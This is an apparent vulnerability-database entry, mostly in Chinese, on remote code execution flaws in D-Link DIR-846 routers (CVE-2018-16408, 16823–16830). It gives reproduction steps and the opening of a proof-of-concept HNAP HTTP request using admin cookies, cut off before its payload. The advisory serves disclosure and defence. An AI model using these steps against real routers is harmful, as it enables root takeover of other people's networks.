D-Link DIR-846 多个漏洞 CVE-2018-16408, CVE-2018-16823/24/25/26/27/28/29/30

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### CVE-2018-16408:Remote code execution D-Link DIR-846 devices with firmware 100.26 allow remote attackers to execute arbitrary code as root via a SetNetworkTomographySettings request by leveraging admin access. ### CVE-2018-16823:Remote code execution **Vul detail** Reproduction Steps: 1. Go to your wi-fi router gateway [i.e: http://192.168.0.1] 2. login with admin 3. Send http request with admin cookies, 4. this POC will create file /tmp/testrce.php and /tmp/testrce1.php: ``` POST /HNAP1/ HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: application/json Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/json SOAPACTION: "http://purenetworks.com/HNAP1/SetPasswdSettings" HNAP_AUTH: D34C44D78E0DA072AE4E94B67361E182 1534384217127 Referer: http://192.168.0.1/account.html Content-Length: 110 Cookie: loginpass=202cb962ac59075b964b07152d234b70; PHPSESSID=e5c635efde382dd2dd21a62b6649278f;...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息